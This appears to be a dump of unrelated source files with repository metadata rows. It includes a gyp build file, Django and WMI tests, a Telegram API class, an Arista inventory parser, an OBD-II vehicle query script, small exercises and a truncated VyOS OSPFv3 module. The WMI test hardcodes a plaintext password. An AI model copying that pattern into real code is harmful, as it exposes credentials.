'../compositor/compositor.gyp:compositor',
'../gfx/gfx.gyp:gfx',
'../ui.gyp:ui',
'../ui_unittests.gyp:run_ui_unittests',
'keyboard',
],
'sources': [
'keyboard_controller_unittest.cc',
],
'conditions': [
['OS=="linux" and linux_use_tcmalloc==1', {
'dependencies': [
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
],
'link_settings': {
'ldflags': ['-rdynamic'],
},
}],
['OS=="win" and win_use_allocator_shim==1', {
'dependencies': [
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
],
}],
],
},
],
}
| [
"[email protected]"
] | |
a9d82f50c1dec7b4eb3ff66f299c04a27101aa6f | 6300fcf67d4fcb5387a9f0f7370a8ffe8f4097d9 | /AutoParts/Tests/base/mixins.py | 35bd3b4584f9a55e5747260ca009f68451a98241 | [] | no_license | Borislav-source/Final-Project | e34ac1cbb71e3a32ed490361d3583c2e1e8bfbc9 | 501b258d103c2e1b8947451f4bdf750709d040fd | refs/heads/master | 2023-07-17T15:03:19.390774 | 2021-09-01T14:06:09 | 2021-09-01T14:06:09 | 393,977,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | from django.utils.timezone import now
from AutoParts.accounts.models import Profile
from AutoParts.vehicle.models import EngineModel, Manufacturer, VehicleModels, Vehicle
class ProfileWithCarMixin:
engine = EngineModel.objects.create(engine='1.8t')
vehicle_manufacturer = Manufacturer.objects.create(name='Mercedes')
vehicle_model = VehicleModels.objects.create(name='C-class', engine=engine, production_date=now())
vehicle = Vehicle.objects.create(manufacturer=vehicle_manufacturer, vehicle_type='Car', model=vehicle_model)
def tearDown(self):
self.vehicle.delete()
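# --- Illustrative usage sketch (editor's addition) ---
# How this mixin is meant to be combined with a Django TestCase; the test class
# and assertion below are hypothetical, not part of the original suite.
# from django.test import TestCase
# class VehicleTests(ProfileWithCarMixin, TestCase):
#     def test_vehicle_has_model(self):
#         self.assertEqual(self.vehicle.model.name, 'C-class')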
| [
"[email protected]"
] | |
c84e38b4c188ec5aeffcefc56fcd15de3ff96624 | 9b1e925d953e29d18451b0bcc0cf2da853d8a29f | /testing/test_wmic.py | 71ef426d6ace68ee24105facbcf4c9bbffc30496 | [] | no_license | safl/levis | a61eeb72e620a924ed185d03988ad5ce5c39654b | e6f007f7f74e92c82da16c5645b3f41eb16c77cb | refs/heads/master | 2016-09-06T16:47:43.456935 | 2011-03-07T20:22:19 | 2011-03-07T20:22:19 | 1,360,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,256 | py | #!/usr/bin/env python
import unittest, os
import wmic
class TestKeyParsing(unittest.TestCase):
def setUp(self):
self.wmi_target = {
"host": "192.168.1.101",
"domain": "",
"user": "safl",
"pass": "bufasbufas"
}
self.queries = {
'filesize': "SELECT Name, FileSize FROM CIM_DataFile WHERE Name = 'c:\\\\hej.pst'",
'exefiles': "SELECT Name, FileSize FROM CIM_DataFile WHERE Extension = 'exe'",
'service_enum': "SELECT * FROM Win32_Service",
'service_state': "SELECT Name, State FROM Win32_Service WHERE Name = 'SysmonLog'",
'disk_enum': "SELECT * FROM Win32_LogicalDisk",
'disks': "SELECT * FROM Win32_DiskDrive",
'disk_free': "SELECT Name, DeviceID, FreeSpace FROM Win32_LogicalDisk WHERE DeviceID = 'C:'",
'cpu_enum': "SELECT * FROM Win32_Processor",
'cpu_util': "SELECT Name, DeviceID, LoadPercentage FROM Win32_Processor WHERE DeviceID = 'CPU0'",
'cpu_avg': "SELECT Name, LoadPercentage FROM Win32_Processor",
'os_enum': "SELECT * FROM Win32_OperatingSystem",
'tapedrive': "SELECT * FROM Win32_TapeDrive",
'os_uptime': "SELECT LastBootUpTime FROM Win32_OperatingSystem",
'os_mem_free_phys': "SELECT FreePhysicalMemory FROM Win32_OperatingSystem",
'os_mem_free_virt': "SELECT FreeVirtualMemory FROM Win32_OperatingSystem",
'bios': "SELECT * FROM Win32_Bios",
'perf_enum': "SELECT * FROM Win32_PerfRawData_PerfOS_System",
'perf': "SELECT * FROM Win32_PerfFormattedData",
'eventlog_enum': "SELECT CategoryString, EventCode, EventType, Logfile, SourceName, TimeGenerated, TimeWritten FROM Win32_NTLogEvent WHERE TimeWritten > '20100323193917.000000+060'",
'eventlog_describe': "SELECT * FROM Win32_NTLogEvent"
}
def test_connect_and_query(self):
(out, ret) = wmic.query(self.wmi_target, self.queries['os_enum'])
print out, ret
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
2ceb8b6e1ccafafc87279f7ec6943a194f4efdb5 | 40606a0f9bcbe851fcfa3b6bce0f090c267656fe | /models/subnets/__init__.py | 21ebd52d4362421987fce59d36fdd4254dc45f88 | [
"Apache-2.0"
] | permissive | ryanwongsa/open-images-2019-challenge | d15f0aa4042c5622f56e268539c5ba20321d3563 | b49e0933451c4bf9b31a9a8faf1bd8ba3dee1cc5 | refs/heads/master | 2020-06-26T19:23:45.432268 | 2019-10-07T19:20:40 | 2019-10-07T19:20:40 | 199,730,058 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103 | py | from .regression_subnet import RegressionSubnet
from .classification_subnet import ClassificationSubnet
| [
"[email protected]"
] | |
3bf22289b93db09ad9e3ef68a0b53fb48f6a960e | 028d788c0fa48a8cb0cc6990a471e8cd46f6ec50 | /Python-OOP/Exam/project/fish/base_fish.py | 56973ffd676945dedddedc868c3419b8b1d3ed8c | [] | no_license | Sheko1/SoftUni | d6b8e79ae545116f4c0e5705ad842f12d77a9c9d | a9fbeec13a30231b6a97c2b22bb35257ac1481c0 | refs/heads/main | 2023-07-13T15:39:48.826925 | 2021-08-21T12:51:02 | 2021-08-21T12:51:02 | 317,266,200 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | from abc import ABC, abstractmethod
class BaseFish(ABC):
size_to_increase = 5
def __init__(self, name: str, species: str, size: int, price: float):
self.name = name
self.species = species
self.size = size
self.price = price
@property
def name(self):
return self.__name
@name.setter
def name(self, value):
if not value:
raise ValueError("Fish name cannot be an empty string.")
self.__name = value
@property
def species(self):
return self.__species
@species.setter
def species(self, value):
if not value:
raise ValueError("Fish species cannot be an empty string.")
self.__species = value
@property
def price(self):
return self.__price
@price.setter
def price(self, value):
if value <= 0:
raise ValueError("Price cannot be equal to or below zero.")
self.__price = value
@abstractmethod
def eat(self):
self.size += self.size_to_increase
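# --- Illustrative usage sketch (editor's addition) ---
# A minimal concrete subclass; the name/species/price values are placeholders
# chosen purely to demonstrate the validation and the eat() size increase.
if __name__ == '__main__':
    class GoldFish(BaseFish):
        def eat(self):
            super().eat()
    fish = GoldFish('Bubbles', 'Goldfish', size=10, price=2.50)
    fish.eat()
    print(fish.size)  # 15: eat() grows the fish by size_to_increase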
| [
"[email protected]"
] | |
49c315b88481e4a6d78a623438fcbeda3f56a89d | e2e8d2462bcd97fe94b959e8d541f9856b136357 | /ENV/lib/python3.5/site-packages/pyrogram/api/functions/messages/get_game_high_scores.py | dbe17ff41a0be895d46d862131acaeb138dd7eb8 | [
"MIT"
] | permissive | wasweisic/CryptoPredicted | a8babd459ab1da634014830be77615356d0200f7 | 7f660cdc456fb8252b3125028f31fd6f5a3ceea5 | refs/heads/master | 2023-04-12T12:34:29.317983 | 2021-02-01T13:07:18 | 2021-02-01T13:07:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,368 | py | # Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2018 Dan Tès <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.api.core import *
class GetGameHighScores(Object):
"""Attributes:
ID: ``0xe822649d``
Args:
peer: Either :obj:`InputPeerEmpty <pyrogram.api.types.InputPeerEmpty>`, :obj:`InputPeerSelf <pyrogram.api.types.InputPeerSelf>`, :obj:`InputPeerChat <pyrogram.api.types.InputPeerChat>`, :obj:`InputPeerUser <pyrogram.api.types.InputPeerUser>` or :obj:`InputPeerChannel <pyrogram.api.types.InputPeerChannel>`
id: ``int`` ``32-bit``
user_id: Either :obj:`InputUserEmpty <pyrogram.api.types.InputUserEmpty>`, :obj:`InputUserSelf <pyrogram.api.types.InputUserSelf>` or :obj:`InputUser <pyrogram.api.types.InputUser>`
Raises:
:obj:`Error <pyrogram.Error>`
Returns:
:obj:`messages.HighScores <pyrogram.api.types.messages.HighScores>`
"""
ID = 0xe822649d
def __init__(self, peer, id: int, user_id):
self.peer = peer # InputPeer
self.id = id # int
self.user_id = user_id # InputUser
@staticmethod
def read(b: BytesIO, *args) -> "GetGameHighScores":
# No flags
peer = Object.read(b)
id = Int.read(b)
user_id = Object.read(b)
return GetGameHighScores(peer, id, user_id)
def write(self) -> bytes:
b = BytesIO()
b.write(Int(self.ID, False))
# No flags
b.write(self.peer.write())
b.write(Int(self.id))
b.write(self.user_id.write())
return b.getvalue()
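# --- Illustrative usage sketch (editor's addition) ---
# Building the TL function and serialising it; the InputPeerSelf/InputUser
# constructors and their arguments are assumptions for illustration only.
# from pyrogram.api.types import InputPeerSelf, InputUser
# req = GetGameHighScores(peer=InputPeerSelf(), id=42,
#                         user_id=InputUser(user_id=123, access_hash=0))
# payload = req.write()  # raw TL bytes, sent by the client over MTProto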
| [
"[email protected]"
] | |
9fb483bd59a64a4079e937ff1466937a02383c7e | 48894ae68f0234e263d325470178d67ab313c73e | /sa/profiles/Arista/EOS/get_inventory.py | b981153e1be44768007d5d21e68c85dc6a016ed1 | [
"BSD-3-Clause"
] | permissive | DreamerDDL/noc | 7f949f55bb2c02c15ac2cc46bc62d957aee43a86 | 2ab0ab7718bb7116da2c3953efd466757e11d9ce | refs/heads/master | 2021-05-10T18:22:53.678588 | 2015-06-29T12:28:20 | 2015-06-29T12:28:20 | 118,628,133 | 0 | 0 | null | 2018-01-23T15:19:51 | 2018-01-23T15:19:51 | null | UTF-8 | Python | false | false | 3,559 | py | # -*- coding: utf-8 -*-
##----------------------------------------------------------------------
## Arista.EOS.get_inventory
##----------------------------------------------------------------------
## Copyright (C) 2007-2013 The NOC Project
## See LICENSE for details
##----------------------------------------------------------------------
## Python modules
import re
## NOC modules
from noc.sa.script import Script as NOCScript
from noc.sa.interfaces.igetinventory import IGetInventory
from noc.lib.text import parse_table
class Script(NOCScript):
name = "Arista.EOS.get_inventory"
cache = True
implements = [IGetInventory]
rx_section = re.compile("System has (\d+) (.+?)$", re.MULTILINE)
def execute(self):
objects = []
v = self.cli("show inventory")
sections = self.rx_section.split(v)
objects += self.parse_chassis(sections.pop(0))
while sections:
cnt, type, data = sections[:3]
sections = sections[3:]
t = type.lower()
if t.startswith("power supply"):
objects += self.parse_psu(data)
elif t.startswith("fan"):
objects += self.parse_fan(data)
elif t.startswith("transceiver"):
objects += self.parse_transceiver(data)
return objects
@classmethod
def parse_chassis(cls, data):
objects = []
parts = data.split("\n\n")
# Chassis section
_, ctable = parts[0].split("\n", 1)
n = 0
for part_no, description in parse_table(ctable):
objects += [{
"type": "CHASSIS",
"number": str(n),
"vendor": "ARISTA",
"serial": None,
"description": description,
"part_no": part_no,
"revision": None,
"builtin": False
}]
n += 1
# Serial/revision section
n = 0
for rev, serial, mfg_data in parse_table(parts[1]):
objects[n]["revision"] = rev
objects[n]["serial"] = serial
n += 1
return objects
@classmethod
def parse_psu(cls, data):
objects = []
for slot, part_no, serial in parse_table(data.strip()):
objects += [{
"type": "PWR",
"number": slot,
"vendor": "ARISTA",
"serial": serial,
"part_no": part_no,
"builtin": False
}]
return objects
@classmethod
def parse_fan(cls, data):
objects = []
for slot, nfans, part_no, serial in parse_table(data.strip()):
objects += [{
"type": "FAN",
"number": slot,
"vendor": "ARISTA",
"serial": serial,
"part_no": part_no,
"builtin": False
}]
return objects
@classmethod
def parse_transceiver(cls, data):
objects = []
for port, vendor, part_no, serial, rev in parse_table(data.strip()):
vendor = vendor.upper()
if vendor == "NOT PRESENT":
continue
if vendor == "ARISTA NETWORKS":
vendor = "ARISTA"
objects += [{
"type": "XCVR",
"number": port,
"vendor": vendor,
"serial": serial,
"part_no": part_no,
"builtin": False
}]
return objects
| [
"[email protected]"
] | |
46b93892928e8b45940441867657548a521a2644 | 364020e5cb0f057f4e63b8e0c43a03c565bb249d | /panda/examples/query_vin_and_stats.py | f3d6c198aff9f1485743a904d083deab4cee5fb4 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | Gernby/openpilot | fb7c9e607be438334aaf48e338de7f07343a7873 | d8da18ed546637a8d6a00d2b4c9dfafb90d2a4dd | refs/heads/devel | 2020-04-05T02:04:56.217699 | 2019-07-01T21:15:34 | 2019-07-01T21:15:34 | 156,462,811 | 38 | 75 | MIT | 2020-04-25T21:01:31 | 2018-11-06T23:34:08 | C++ | UTF-8 | Python | false | false | 1,723 | py | #!/usr/bin/env python
import time
import struct
from panda import Panda
from hexdump import hexdump
from panda.python.isotp import isotp_send, isotp_recv
# 0x7e0 = Toyota
# 0x18DB33F1 for Honda?
def get_current_data_for_pid(pid):
# 01 xx = Show current data
isotp_send(panda, "\x01"+chr(pid), 0x7e0)
return isotp_recv(panda, 0x7e8)
def get_supported_pids():
ret = []
pid = 0
while 1:
supported = struct.unpack(">I", get_current_data_for_pid(pid)[2:])[0]
for i in range(1+pid, 0x21+pid):
if supported & 0x80000000:
ret.append(i)
supported <<= 1
pid += 0x20
if pid not in ret:
break
return ret
if __name__ == "__main__":
panda = Panda()
panda.set_safety_mode(Panda.SAFETY_ELM327)
panda.can_clear(0)
# 09 02 = Get VIN
isotp_send(panda, "\x09\x02", 0x7df)
ret = isotp_recv(panda, 0x7e8)
hexdump(ret)
print "VIN: %s" % ret[2:]
# 03 = get DTCs
isotp_send(panda, "\x03", 0x7e0)
dtcs = isotp_recv(panda, 0x7e8)
print "DTCs:", dtcs[2:].encode("hex")
supported_pids = get_supported_pids()
print "Supported PIDs:",supported_pids
while 1:
speed = struct.unpack(">B", get_current_data_for_pid(13)[2:])[0] # kph
rpm = struct.unpack(">H", get_current_data_for_pid(12)[2:])[0]/4.0 # revs
throttle = struct.unpack(">B", get_current_data_for_pid(17)[2:])[0]/255.0 * 100 # percent
temp = struct.unpack(">B", get_current_data_for_pid(5)[2:])[0] - 40 # degrees C
load = struct.unpack(">B", get_current_data_for_pid(4)[2:])[0]/255.0 * 100 # percent
print "%d KPH, %d RPM, %.1f%% Throttle, %d deg C, %.1f%% load" % (speed, rpm, throttle, temp, load)
time.sleep(0.2)
| [
"[email protected]"
] | |
3b3efdfad9fac7e5373bbc3882ccc7ed1d90ec0f | afc87a0ecde9869df0802d6ad79d18d9722727d8 | /oregon/home/templatetags/home_d3tags.py | c524d18698e81791c61541dc6872a722ddcb0dd8 | [] | no_license | hobson/oregon | cc005e5fb158142cb0879db1bae73b040815cc3a | 4cd3cc8696db25f531839dbda4c903357df27e58 | refs/heads/master | 2021-01-19T03:23:29.595855 | 2013-10-01T05:57:40 | 2013-10-01T05:57:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | from django.core.serializers import serialize
from django.core.serializers.json import DjangoJSONEncoder
from django.db.models.query import QuerySet
from django.template import Library
from django.utils import simplejson
register = Library()
#@register.filter(name='jsonify')
def jsonify(object):
if isinstance(object, QuerySet):
return serialize('json', object)
return simplejson.dumps(object, cls=DjangoJSONEncoder)
jsonify.is_safe=True
register.filter('jsonify', jsonify)
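# --- Illustrative usage sketch (editor's addition) ---
# After loading this tag library in a template, the filter can serialise a
# queryset straight into an inline <script> for d3 (variable name assumed):
#
#   {% load home_d3tags %}
#   <script>var data = {{ mydata|jsonify|safe }};</script>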
| [
"[email protected]"
] | |
6856c56c7c43315dc8a2657bc9746e449d89c043 | 56fdddd67821db9bb21dc2f851a1ae3b22256429 | /s1level41.py | 0c008ae52c1c1f555652671295617d095ad07e47 | [
"Unlicense"
] | permissive | gemeraldsfilms/code-org-python | 359276751a08d6a66ca5199dbdd1004c5d4eccd1 | bd6e0871de3e23d3e94212caf94d57997b504134 | refs/heads/master | 2021-01-14T11:25:58.986699 | 2014-10-31T18:21:33 | 2014-10-31T18:21:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | import codestudio
artist = codestudio.load('s1level41')
for count in range(10):
artist.pen.color = 'random'
for count in range(4):
artist.move_forward(20)
artist.turn_right(90)
artist.move_forward(20)
artist.check()
| [
"[email protected]"
] | |
1023ebd93d98f3012ed40bb1e458b458c8d3cddf | 875a711df288d33778e2ae876f8f67490c91a7a1 | /PathMangerExamples.py | f64b79ab66d397fdd0efb3a13b2f0faacbcb5338 | [] | no_license | zethwillie/chrlx_pipe | 4c45bd51591a6dbdbe848da348ae3835569397d7 | 7c69818c125fc01a07a7294bd8d34d28a61f04bc | refs/heads/master | 2021-01-22T21:17:56.259480 | 2017-08-18T04:28:11 | 2017-08-18T04:28:11 | 100,672,617 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,630 | py | from chrlx.utils import PathManager
path = PathManager("G:\jobs\charlex_testArea_T60173\W_psultan\scenes\shot010\lgt\workshop\T60173W_010_std_software.01.ma")
#job info determined by folder structure
print "jobNumber:", path.jobNumber
print "jobDirname:", path.jobDirname
print "jobShortname:", path.jobShortname
print "jobType:", path.jobType
print "jobPath:", path.jobPath
print "spotLetter:", path.spotLetter
print "spotDirname:", path.spotDirname
print "spotFullname:", path.spotFullname
print "spotShortname:", path.spotShortname
print "spotSchema:", path.spotSchema
print "spotPath:", path.spotPath
print "projectPath:", path.projectPath
print "configPath:", path.configPath
print "assetPath:", path.assetPath
print "charPath:", path.charPath
print "propPath:", path.propPath
print "shot:", path.shot
print "shotName:", path.shotName
print "shotType:", path.shotType
print "shotFullname:", path.shotFullname
print "shotShortname:", path.shotShortname
print "shotStage:", path.shotStage
print "scenePath:", path.scenePath
print "compPath:", path.compPath
print "anmPath:", path.anmPath
print "lgtPath:", path.lgtPath
print "jobId", path.job.id #many attributes are accessible with dot notation
#folder navigation
print "scenePath", path.scenePath
print "compPath", path.compPath
print "framesPath", path.framesPath
#job info determined by db
print "start_date", path.job.start_date
print "status", path.spot.status
#lgt shot specific functions
print "variants", path.getVariants()
print "masters", path.getMasters()
print "mastername", path.getMasterName()
print "version", path.getVersion()
| [
"[email protected]"
] | |
1d0101942a1f8158b1df89d28a581f8a989d6099 | a7cca49626a3d7100e9ac5c2f343c351ecb76ac7 | /tests/dev_tests/get_machine_freq.py | 53f58efc5548afd9221dc39ed26ccc27e86361d3 | [
"MIT"
] | permissive | Carglglz/upydev | 104455d77d64300074bda54d86bd791f19184975 | 529aa29f3e1acf8160383fe410b5659110dc96de | refs/heads/master | 2023-05-24T18:38:56.242500 | 2022-10-21T14:03:17 | 2022-10-21T14:03:17 | 199,335,165 | 49 | 9 | MIT | 2022-10-21T14:03:18 | 2019-07-28T20:42:00 | Python | UTF-8 | Python | false | false | 137 | py | import machine
def freq():
fq = machine.freq()
if isinstance(fq, tuple):
return int(fq[0]/1e6)
return int(fq/1e6)
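# --- Illustrative usage sketch (editor's addition) ---
# On a MicroPython board, machine.freq() returns Hz (or a tuple of clock values
# in Hz on ports such as the pyboard), so freq() normalises either shape to MHz:
# >>> freq()
# 240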
| [
"[email protected]"
] | |
bc5354942ec4f909d4ccdf9434a01480c07a0da5 | 86cc17a69213569af670faed7ad531cb599b960d | /player12.py | 9f6d8ddf708fb3e1cbee2e05883e552d33187881 | [] | no_license | LakshmikanthRavi/guvi-lux | ed1c389e27a9ec62e0fd75c140322563f68d311a | 5c29f73903aa9adb6484c76103edf18ac165259e | refs/heads/master | 2020-04-15T05:07:19.743874 | 2019-08-13T08:53:00 | 2019-08-13T08:53:00 | 164,409,489 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | u,m=map(int,input().split())
g=list(map(int,input().split()))
r=[]
for i in range(u-m,u):
r.append(g[i])
for i in g:
if i not in r:
r.append(i)
print(*r)
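# --- Editor's note with a worked example (addition) ---
# The snippet rotates the last m of the u values to the front. For input
# "5 2" and "1 2 3 4 5" it prints "4 5 1 2 3". Note the `i not in r`
# membership test assumes the values are distinct; duplicates would be dropped.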
| [
"[email protected]"
] | |
e02eccd31bb9c7d6aaa7d19529cafad2e12d8805 | 672ea11a7dee763fc8c37bc82bb609b8de19344c | /src/生成斗地主扑克牌.py | 28fff2f03a30318453efc6cfebefc64fa9a69cbd | [] | no_license | qlong8807/python3-lesson | 294ede6a0de1d89f513209b00504e8f0c9bb2607 | ac4e745a8e8d0ab665e2ff676ddcd0ab190fed06 | refs/heads/master | 2020-04-08T15:18:44.564272 | 2020-02-18T08:33:30 | 2020-02-18T08:33:30 | 159,472,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # coding:utf8
# author:jans
# desc: shuffle and deal playing cards for Dou Dizhu ("Fight the Landlord")
import random
poker_num = [str(i) for i in range(2,11)]
poker_str = ['A','J','Q','K']
poker_king = ['Big Joker','Small Joker']
poker_color = ['Heart','Spade','Diamond','Club']
pokers = ['%s%s' %(i,j) for i in poker_color for j in poker_num+poker_str] + poker_king
print(len(pokers))
print(pokers)
print('Start shuffling')
random.shuffle(pokers)
print('Shuffling...')
print(pokers)
# deal for Dou Dizhu: 17 cards to each of three players, 3 bottom cards left over
person_a = pokers[0:51:3]
person_b = pokers[1:51:3]
person_c = pokers[2:51:3]
last_3 = pokers[-3:]
print("Player 1's cards:",person_a)
print("Player 2's cards:",person_b)
print("Player 3's cards:",person_c)
print('Bottom cards:',last_3)
| [
"[email protected]"
] | |
4ab465fcdde84101246798cce491652b00295dce | 63cf686bf970d28c045719de2f0e7e9dae5bed15 | /N-th Tribonacci Number.py | 13e5231116e6aba79408a56a4f23a7c77a01f1bf | [] | no_license | menard-noe/LeetCode | 6461bda4a076849cf69f2cd87999275f141cc483 | 4e9c50d256c84d1b830a7642b265619a0b69d542 | refs/heads/master | 2022-12-13T09:41:41.682555 | 2020-09-14T12:46:53 | 2020-09-14T12:46:53 | 282,481,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 493 | py | from typing import List
class Solution:
def __init__(self):
self.memo = {0: 0, 1: 1, 2: 1}
def tribonacci(self, n: int) -> int:
if n in self.memo:
return self.memo[n]
else:
self.memo[n] = self.tribonacci(n - 1) + self.tribonacci(n - 2) + self.tribonacci(n - 3)
return self.memo[n]
if __name__ == "__main__":
# execute only if run as a script
n = 25
solution = Solution()
print(solution.tribonacci(n))
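# --- Illustrative alternative (editor's addition) ---
# The memoised recursion above is O(n) time but O(n) space and can hit Python's
# recursion limit for large n; an equivalent iterative version needs O(1) space.
def tribonacci_iterative(n: int) -> int:
    a, b, c = 0, 1, 1  # T(0), T(1), T(2)
    if n == 0:
        return a
    for _ in range(n - 2):
        a, b, c = b, c, a + b + c
    return c if n >= 2 else b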
| [
"[email protected]"
] | |
d37e9764102913288d0e90d9ba66699201662d2d | 3b2940c38412e5216527e35093396470060cca2f | /top/api/rest/LogisticsOrderShengxianConfirmRequest.py | 3a40c08aaf7002f5809c5f42c433f502317e3311 | [] | no_license | akingthink/goods | 842eb09daddc2611868b01ebd6e330e5dd7d50be | ffdb5868a8df5c2935fc6142edcdf4c661c84dca | refs/heads/master | 2021-01-10T14:22:54.061570 | 2016-03-04T09:48:24 | 2016-03-04T09:48:24 | 45,093,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | '''
Created by auto_sdk on 2015-01-20 12:44:31
'''
from top.api.base import RestApi
class LogisticsOrderShengxianConfirmRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.cancel_id = None
self.delivery_type = None
self.logis_id = None
self.out_sid = None
self.seller_ip = None
self.sender_id = None
self.service_code = None
self.tid = None
def getapiname(self):
return 'taobao.logistics.order.shengxian.confirm'
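# --- Illustrative usage sketch (editor's addition) ---
# Field values below are placeholders; execution goes through the TOP SDK's
# RestApi base class (the exact send method depends on top.api.base, so the
# getResponse() call here is an assumption).
# req = LogisticsOrderShengxianConfirmRequest()
# req.tid = 123456789            # trade id
# req.out_sid = 'SF0000000001'   # shipping waybill number
# resp = req.getResponse()       # assumed TOP SDK call that signs and posts the request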
| [
"[email protected]"
] | |
f4e4d6b578a9c7190f7a40207d6430cb833bbfc4 | 64bf39b96a014b5d3f69b3311430185c64a7ff0e | /intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/vyos/vyos/plugins/modules/vyos_ospfv3.py | ca5bc93c40b037794dbda36f2d1e71f79b91fbb5 | [
"MIT",
"GPL-3.0-or-later",
"LicenseRef-scancode-unknown-license-reference",
"GPL-3.0-only"
] | permissive | SimonFangCisco/dne-dna-code | 7072eba7da0389e37507b7a2aa5f7d0c0735a220 | 2ea7d4f00212f502bc684ac257371ada73da1ca9 | refs/heads/master | 2023-03-10T23:10:31.392558 | 2021-02-25T15:04:36 | 2021-02-25T15:04:36 | 342,274,373 | 0 | 0 | MIT | 2021-02-25T14:39:22 | 2021-02-25T14:39:22 | null | UTF-8 | Python | false | false | 18,590 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for vyos_ospfv3
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: vyos_ospfv3
short_description: OSPFV3 resource module
description: This resource module configures and manages attributes of OSPFv3 routes
on VyOS network devices.
version_added: 1.0.0
notes:
- Tested against VyOS 1.1.8 (helium).
- This module works with connection C(network_cli). See L(the VyOS OS Platform Options,../network/user_guide/platform_vyos.html).
author:
- Rohit Thakur (@rohitthakur2590)
options:
config:
description: A provided OSPFv3 route configuration.
type: dict
suboptions:
areas:
description: OSPFv3 area.
type: list
elements: dict
suboptions:
area_id:
description: OSPFv3 Area name/identity.
type: str
export_list:
description: Name of export-list.
type: str
import_list:
description: Name of import-list.
type: str
range:
description: Summarize routes matching prefix (border routers only).
type: list
elements: dict
suboptions:
address:
description: border router IPv4 address.
type: str
advertise:
description: Advertise this range.
type: bool
not_advertise:
description: Don't advertise this range.
type: bool
parameters:
description: OSPFv3 specific parameters.
type: dict
suboptions:
router_id:
description: Override the default router identifier.
type: str
redistribute:
description: Redistribute information from another routing protocol.
type: list
elements: dict
suboptions:
route_type:
description: Route type to redistribute.
type: str
choices: [bgp, connected, kernel, ripng, static]
route_map:
description: Route map references.
type: str
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the VyOS device
by executing the command B(show configuration commands | grep ospfv3).
- The state I(parsed) reads the configuration from C(running_config) option and
transforms it into Ansible structured data as per the resource module's argspec
and the value is then returned in the I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in.
type: str
choices:
- merged
- replaced
- deleted
- parsed
- gathered
- rendered
default: merged
"""
EXAMPLES = """
# Using merged
#
# Before state:
# -------------
#
# vyos@vyos# run show configuration commands | grep ospfv3
#
#
- name: Merge the provided configuration with the existing running configuration
vyos.vyos.vyos_ospfv3:
config:
redistribute:
- route_type: bgp
parameters:
router_id: 192.0.2.10
areas:
- area_id: '2'
export_list: export1
import_list: import1
range:
- address: 2001:db10::/32
- address: 2001:db20::/32
- address: 2001:db30::/32
- area_id: '3'
range:
- address: 2001:db40::/32
state: merged
#
#
# -------------------------
# Module Execution Result
# -------------------------
#
# before": {}
#
# "commands": [
# "set protocols ospfv3 redistribute bgp",
# "set protocols ospfv3 parameters router-id '192.0.2.10'",
# "set protocols ospfv3 area 2 range 2001:db10::/32",
# "set protocols ospfv3 area 2 range 2001:db20::/32",
# "set protocols ospfv3 area 2 range 2001:db30::/32",
# "set protocols ospfv3 area '2'",
# "set protocols ospfv3 area 2 export-list export1",
# "set protocols ospfv3 area 2 import-list import1",
# "set protocols ospfv3 area '3'",
# "set protocols ospfv3 area 3 range 2001:db40::/32"
# ]
#
# "after": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db20::/32"
# },
# {
# "address": "2001:db30::/32"
# }
# ]
# },
# {
# "area_id": "3",
# "range": [
# {
# "address": "2001:db40::/32"
# }
# ]
# }
# ],
# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
#
# After state:
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
# set protocols ospfv3 area 2 range '2001:db20::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 3 range '2001:db40::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
# Using replaced
#
# Before state:
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
